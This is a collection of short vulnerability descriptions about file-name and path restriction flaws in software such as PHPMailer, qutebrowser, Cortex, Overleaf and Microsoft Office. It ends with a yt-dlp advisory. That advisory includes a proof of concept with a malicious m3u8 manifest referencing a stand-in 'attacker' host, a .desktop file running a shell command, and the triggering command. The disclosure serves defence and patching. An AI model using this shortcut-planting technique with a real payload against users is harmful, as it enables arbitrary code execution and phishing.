CWE-641

PHPMailer 6.1.8 through 6.4.0 allows object injection through Phar Deserialization via addAttachment with a UNC pathname. NOTE: this is similar to CVE-2018-19296, but arose because 6.1.8 fixed a functionality problem in which UNC pathnames were always considered unreadable by PHPMailer, even in safe contexts. As an unintended side effect, this fix eliminated the code that blocked addAttachment exploitation.

qutebrowser is an open source keyboard-focused browser with a minimal GUI. Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers a `qutebrowserurl:` URL handler. With certain applications, opening a specially crafted `qutebrowserurl:...` URL can lead to execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`. Only Windows installs where qutebrowser is registered as URL handler are affected. The issue has been fixed in qutebrowser v2.4.0. The fix also adds additional hardening for potential similar issues on Linux (by adding the new --untrusted-args flag to the .desktop file), though no such vulnerabilities are known.

Improper restriction of names for files and other resources in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network.

Windows Distributed File System (DFS) Remote Code Execution Vulnerability

Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.

Cortex provides multi-tenant, long term storage for Prometheus. A local file inclusion vulnerability exists in Cortex versions 1.13.0, 1.13.1 and 1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Alertmanager service where `-experimental.alertmanager.enable-api` or `enable_api: true` is configured are affected. Affected Cortex users are advised to upgrade to patched versions 1.13.2 or 1.14.1. However as a workaround, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section before sending to the Set Alertmanager Configuration API.

Microsoft Outlook Remote Code Execution Vulnerability

Microsoft Office OneNote Remote Code Execution Vulnerability

Improper input validation in Microsoft Office allows an unauthorized attacker to execute code locally.

File path manipulation vulnerability in BF-OS version 3.00 up to and including 3.83 allows an attacker to modify the file path to access different resources, which may contain sensitive information.

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

Overleaf is a web-based collaborative LaTeX editor. Overleaf Community Edition and Server Pro prior to version 5.0.7 (or 4.2.7 for the 4.x series) contain a vulnerability that allows an arbitrary language parameter in client spelling requests to be passed to the `aspell` executable running on the server. This causes `aspell` to attempt to load a dictionary file with an arbitrary filename. File access is limited to the scope of the overleaf server. The problem is patched in versions 5.0.7 and 4.2.7. Previous versions can be upgraded using the Overleaf toolkit `bin/upgrade` command. Users unable to upgrade may block POST requests to `/spelling/check` via a Web Application Firewall will prevent access to the vulnerable spell check feature. However, upgrading is advised.

51l3nc3, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API mediaclip.cgi did not have a sufficient input validation allowing for uploading more audio clips then designed resulting in the Axis device running out of memory.  Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.

Luminance Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can create a text file with arbitrary character sequences and trigger the application to process the input, causing the application to become unresponsive or terminate abnormally.

### Summary A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as `.desktop`, `.url`, `.webloc`) to the user's filesystem, bypassing the remediation for `CVE-2024-38519`. ### Details The fix for `CVE-2024-38519` enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as `.exe` or `.sh`) during file downloads. However, this allowlist explicitly included the unsafe extensions `.desktop`, `.url`, and `.webloc` so that the functionality of the `--write-link` option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download. Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an `EXT-X-MEDIA:TYPE=SUBTITLES` tag with a malicious URI (e.g., `URI="http://attacker/x.desktop"`), which would result in yt-dlp writing the attacker-controlled content to a file with a `.desktop` extension if the user had passed the `--write-subs` option. Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments. While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution. ### Proof of Concept **1. Start a malicious server:** Host a malicious `master.m3u8` manifest that points to malicious subtitle payloads: ```m3u8 #EXTM3U #EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en" ``` And host the `payload.desktop` file with malicious content: ```ini [Desktop Entry] Type=Application Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)" Name=Subtitle ``` **2. Trigger the download:** In this case, the generic extractor triggers the exploit if the `--write-subs` option is used: ```bash yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8" ``` **Result:** yt-dlp writes `MyVideo.en.desktop` to disk, containing the attacker payload. ### Patches yt-dlp version 2026.06.09 fixes this issue by removing `.url`, `.desktop` and `.webloc` from the global file extension allowlist, and by only allowing those file types to be written from within the context of the `--write-link` options' functionality. ### Workarounds It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible. Users who are not able to upgrade should do ALL of the following: - Only pass fully **trusted** input URLs to yt-dlp - Do not use the `--write-subs`, `--write-auto-subs`, `--embed-subs`, `--write-thumbnail`, `--write-all-thumbnails`, or `--embed-thumbnail` options - Use `--format -` to interactively select download formats and validate their file extensions